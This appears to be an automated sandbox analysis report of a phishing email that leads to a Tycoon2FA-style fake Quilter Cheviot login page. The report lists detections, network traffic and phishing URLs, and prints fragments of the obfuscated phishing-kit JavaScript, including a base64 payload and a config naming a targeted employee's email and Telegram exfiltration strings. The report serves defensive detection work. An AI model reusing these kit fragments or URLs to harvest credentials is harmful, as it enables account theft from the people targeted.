Edit tour

Windows Analysis Report
message__0XSkcQEiS5ehXOfhSk9JKw_geopod_ismtpd_30_.eml

Overview

General Information

Sample name:message__0XSkcQEiS5ehXOfhSk9JKw_geopod_ismtpd_30_.eml
Analysis ID:1641941
MD5:11e0e238d10996702dcef9893e69bfba
SHA1:2be67d6f4f21992b9dcc642154d174596a2f87b1
SHA256:66101f19ed9097e71c47e841316729e51b48442dd77dbc9e75a2e38e48fdd60b
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
AI detected suspicious URL
AI detected suspicious elements in Email content
AI detected suspicious elements in Email header
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 2468 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\message__0XSkcQEiS5ehXOfhSk9JKw_geopod_ismtpd_30_.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 2460 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A7DF7246-10A0-4098-9443-EDC4BD1936C6" "66FD239E-9DE5-46C9-9CD3-55A0C6CBD113" "2468" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 4604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RNAYJ7P1\9114950926.svg MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 3284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1972,i,10470063623338701964,3264311356742323731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_92JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
    dropped/chromecache_92JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
      SourceRuleDescriptionAuthorStrings
      1.7..script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
        1.1.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
          1.1.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
            1.2.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
              1.2.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
                Click to see the 22 entries
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 2468, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
                Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RNAYJ7P1\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 2468, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.18, DestinationIsIpv6: false, DestinationPort: 49709, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, Initiated: true, ProcessId: 2468, Protocol: tcp, SourceIp: 52.123.131.14, SourceIsIpv6: false, SourcePort: 443
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                Phishing

                barindex
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWJoe Sandbox AI: Score: 9 Reasons: The brand 'Quilter' is associated with Quilter Cheviot, a known investment management company., The legitimate domain for Quilter Cheviot is 'quiltercheviot.com'., The provided URL 'quiltercheviot.uuvght.ru' does not match the legitimate domain., The domain extension '.ru' is unusual for a UK-based investment company like Quilter Cheviot., The presence of a password input field on a suspicious domain increases the risk of phishing. DOM: 2.4.pages.csv
                Source: Yara matchFile source: 2.3.pages.csv, type: HTML
                Source: Yara matchFile source: 2.4.pages.csv, type: HTML
                Source: Yara matchFile source: 2.5.pages.csv, type: HTML
                Source: Yara matchFile source: 1.2.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.0.pages.csv, type: HTML
                Source: Yara matchFile source: 1.1.pages.csv, type: HTML
                Source: Yara matchFile source: 1.2.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.0.pages.csv, type: HTML
                Source: Yara matchFile source: 1.1.pages.csv, type: HTML
                Source: Yara matchFile source: 2.19..script.csv, type: HTML
                Source: Yara matchFile source: dropped/chromecache_92, type: DROPPED
                Source: Yara matchFile source: 2.17.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.7..script.csv, type: HTML
                Source: Yara matchFile source: 1.1.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.0.pages.csv, type: HTML
                Source: Yara matchFile source: 2.12..script.csv, type: HTML
                Source: Yara matchFile source: 1.10.d.script.csv, type: HTML
                Source: Yara matchFile source: 2.13..script.csv, type: HTML
                Source: Yara matchFile source: 1.1.pages.csv, type: HTML
                Source: Yara matchFile source: 2.3.pages.csv, type: HTML
                Source: Yara matchFile source: 2.4.pages.csv, type: HTML
                Source: Yara matchFile source: 2.5.pages.csv, type: HTML
                Source: 1.3..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://quiltercheviot.uuvght.ru/nTJ777/... The script contains obfuscated code and URLs, uses dynamic code execution with eval, and interacts with a suspicious domain (pq.uuvght.ru). These high-risk indicators suggest potentially malicious behavior.
                Source: 1.2.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... The script uses dynamic code execution via eval, which is a high-risk indicator. It also contains obfuscated code, another high-risk indicator. These behaviors suggest potential malicious intent, especially given the lack of transparency and the use of obfuscation.
                Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://y13tzxbjz1.moydow.de/DzC0pn01Csl0xBhEB8ZuB... The script constructs a URL using a potentially extracted subdomain from an email or a random string, then redirects to a suspicious domain (uuvght.ru). This behavior is indicative of phishing or malicious redirection, as it manipulates the URL and redirects without user consent. The use of a suspicious domain and the redirection logic contribute to a high-risk score.
                Source: 1.9..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://quiltercheviot.uuvght.ru/nTJ777/... The script uses dynamic code execution via the Function constructor with base64-decoded content, which is a high-risk indicator. It also manipulates the window location to redirect to 'about:blank' and potentially 'https://google.com', suggesting suspicious behavior. The use of obfuscated code and potential data exfiltration or redirection to untrusted domains further increases the risk.
                Source: https://quiltercheviot.uuvght.ruJoe Sandbox AI: The URL 'https://quiltercheviot.uuvght.ru' appears to be targeting the brand 'Quilter Cheviot', a known investment management firm. The domain 'uuvght.ru' does not have any clear association with Quilter Cheviot, and the use of a '.ru' domain extension could be misleading, as it is not the typical domain extension used by the legitimate brand. The subdomain 'quiltercheviot' directly uses the brand name, which increases the likelihood of user confusion. There are no obvious character substitutions, but the structural use of the brand name in the subdomain suggests a potential typosquatting attempt. The similarity score is high due to the direct use of the brand name, and the spoofed score is also high due to the misleading domain extension and potential for user confusion.
                Source: EmailJoe Sandbox AI: Detected potential phishing email: Sender domain 'servis.ai' does not match the claimed sender organization 'quiltercheviot.com'. SVG attachment is a high-risk file type commonly used in phishing attacks. Generic printer notification format but using suspicious domain and mismatched sender info
                Source: EmailJoe Sandbox AI: Detected suspicious elements in Email header: Proofpoint spam details indicate a high phish score of 100, suggesting phishing intent.. Received header shows an unknown sender IP [100.64.100.6], which is suspicious.. Proofpoint classifier explicitly labels the email as 'phish'.. Priority score of 1501 in Proofpoint headers indicates high risk.. No authentication results provided, increasing suspicion.
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: Number of links: 0
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: <input type="password" .../> found but no <form action="...
                Source: https://quiltercheviot.uuvght.ru/nTJ777/#Krichard.thorn%40quiltercheviot.comHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Graphic Card Web Template</title> <style> body { font-family: 'Montserrat', sa...
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: Title: Enter Protected Profile Access does not match URL
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: Invalid link: Terms of use
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: Invalid link: Privacy & cookies
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: Invalid link: Terms of use
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: Invalid link: Privacy & cookies
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: Invalid link: Terms of use
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: Invalid link: Privacy & cookies
                Source: https://quiltercheviot.uuvght.ru/nTJ777/HTTP Parser: function jqeshhapyd(){mldwokqpiy = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagica8bwv0ysbjagfyc2v0psjvveytoci+ciagica8bwv0ysbuyw1lpsj2awv3cg9ydcigy29udgvudd0id2lkdgg9zgv2awnllxdpzhrolcbpbml0awfslxnjywxlpteumci+ciagica8dgl0bgu+qukgvukgvgvtcgxhdgu8l3rpdgxlpgogicagphn0ewxlpgogicagicagigjvzhkgewogicagicagicagicbmb250lwzhbwlsetogj1nlz29lifvjjywgvgfob21hlcbhzw5ldmesifzlcmrhbmesihnhbnmtc2vyawy7ciagicagicagicagigjhy2tncm91bmqty29sb3i6icmxytfhmwe7ciagicagicagicagignvbg9yoiajztblmguwowogicagicagicagicbtyxjnaw46ida7ciagicagicagicagihbhzgrpbmc6ida7ciagicagicagicagigxpbmutagvpz2h0oiaxljy7ciagicagicagfqogicagicagighlywrlcib7ciagicagicagicagigjhy2tncm91bmqty29sb3i6icmwzdq3yte7ciagicagicagicagihbhzgrpbmc6idiwchg7ciagicagicagicagihrlehqtywxpz246ignlbnrlcjskicagicagicagicagym9yzgvylwjvdhrvbtogmnb4ihnvbglkicm2ngi1zjy7ciagicagicagfqogicagicagighlywrlcibomsb7ciagicagicagicagig1hcmdpbjogmdskicagicagicagicagzm9udc1zaxploiazmnb4owogicagicagicagicbjb2xvcjogi2zmzmzmzjskicagicagicb9ciagicagicagbmf2ihskicagicagicagi...
                Source: anonymous functionHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "x6avo";var emailcheck = "richard.thorn@quiltercheviot.com";var webname = "rtrim(/web9/, '/')";var urlo = "/xhssg433q0vlfxw282t0j4tzvt2ieeywr92lvd7p2bpmjtla0peiebuzk";var gdf = "/ghdqwdfam7lugmdptisbtuvuhs8drb9m344njmtijab116";var odf = "/ghlxxpzqvplzj9q6lp9y3e0fyzccmejen5dmcd648";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;...
                Source: EmailClassification: Credential Stealer
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: <input type="password" .../> found
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: No favicon
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: No favicon
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: No favicon
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: No <meta name="author".. found
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: No <meta name="author".. found
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: No <meta name="author".. found
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: No <meta name="copyright".. found
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: No <meta name="copyright".. found
                Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWHTTP Parser: No <meta name="copyright".. found
                Source: unknownHTTPS traffic detected: 104.21.13.170:443 -> 192.168.2.18:49782 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49792 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49793 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49799 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.18:49815 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.18:49817 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.18:49816 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.3.189:443 -> 192.168.2.18:49829 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.6.189:443 -> 192.168.2.18:49834 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.228:443 -> 192.168.2.18:49832 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49921 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.18:49931 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.18:49942 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.18:49948 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49969 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.18:49973 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.18:49974 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.18:49975 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.18:49980 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49981 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49982 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49983 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49991 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49989 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49988 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.18:50018 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.18:50031 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.18:50046 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.18:50048 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.18:50049 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.18:50052 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.112:443 -> 192.168.2.18:50051 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.112:443 -> 192.168.2.18:50050 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.112:443 -> 192.168.2.18:50053 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.112:443 -> 192.168.2.18:50054 version: TLS 1.2
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.18:49709 -> 52.123.131.14:443
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.131
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.131
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /DzC0pn01Csl0xBhEB8ZuBtzVkjUWPyAfYsoLARTnALcLCFnUCNW3DjobhQoJgtJFVwG9u3yxgKVJMxgGbRx2il5WBIbQaIcwT3MQa1jsOGLaAtedE1h9IThKR1LyVBhvwGIHHPsd60cpE2A5rtuhv6I2WjwtnliaqoT9XvtUNVLGJLs5tZQLcBfyptubL9vuVj1dixwg/dOGmOwe0jJcVHNyok9MfrN8x9KudV9hVKZoxRp1y2BOwFcLtHoWhYg7sREANrsfv3A5AfpiuKKaytzguSjLIsQ5RSezJDRkc6zjndnbLTWsxuI8keuUDUfnjzGiSaqgraw5zZ8KKB2TN4ykt2uTP8cCO2lsCahG3cVrtiyW29K12PSaLO0lWjUIFTWblxnTfKoo78ZNc/richard.thorn@quiltercheviot.com HTTP/1.1Host: y13tzxbjz1.moydow.deConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /nTJ777/ HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://y13tzxbjz1.moydow.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
